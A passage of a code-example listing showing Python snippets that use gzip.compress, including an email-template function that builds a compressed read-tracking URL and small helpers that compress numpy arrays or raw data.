                            time.strftime("%Y-%m-%d", time.localtime(send_at)))
            if func_result:
                for k in func_result:
                    temple_content[l] = temple_content[l].replace(
                        '___' + k + '___', str(func_result[k]))
                    read_tracker['properties'][t] = str(
                        read_tracker['properties'][t]).replace(
                            '___' + k + '___', str(func_result[k]))
    track_url = temple_args['ghost_sa'][
        'track_url'] + '?project=' + project + '&data=' + urllib.parse.quote(
            base64.b64encode((gzip.compress(
                json.dumps(read_tracker).encode('utf-8'))))) + '&gzip=1' + (
                    '&remark=' + temple_args['ghost_sa']['remark']
                    if 'remark' in temple_args['ghost_sa'] else '')
    temple_content["content"] = temple_content["content"].replace(
        '___read_tracker___', track_url)
    read_tracker['properties']['action'] = 1
    temple_content["send_tracker"] = read_tracker
    temple_content["ghost_sa"] = temple_args['ghost_sa']
    return temple_content
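# A minimal sketch (not part of the function above) of how the receiving end could recover
# the tracker payload from the `data` query parameter built into track_url; the function
# name and raw_param argument are illustrative only.
import base64
import gzip
import json
import urllib.parse

def decode_tracker_param(raw_param):
    # Reverse of the encoding above: unquote -> base64-decode -> gunzip -> JSON.
    compressed = base64.b64decode(urllib.parse.unquote(raw_param))
    return json.loads(gzip.decompress(compressed).decode('utf-8'))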
Esempio n. 59
0
def convert_numpy_array_to_binary_blob(array, compress=True):
    if compress:
        return gzip.compress(memoryview(array), compresslevel=1)
    else:
        return memoryview(array)
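# A minimal counterpart sketch (not part of the function above): the blob stores only raw
# array bytes, so dtype and shape must be supplied by the caller (the defaults here are
# illustrative only).
import gzip

import numpy as np

def convert_binary_blob_to_numpy_array(blob, dtype=np.float64, shape=None, compressed=True):
    raw = gzip.decompress(blob) if compressed else blob
    array = np.frombuffer(raw, dtype=dtype)
    return array.reshape(shape) if shape is not None else array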
Esempio n. 60
0
    def gzip_compress_v3(data, compresslevel=COMPRESSION_LEVEL):
        return gzip.compress(data, compresslevel=compresslevel)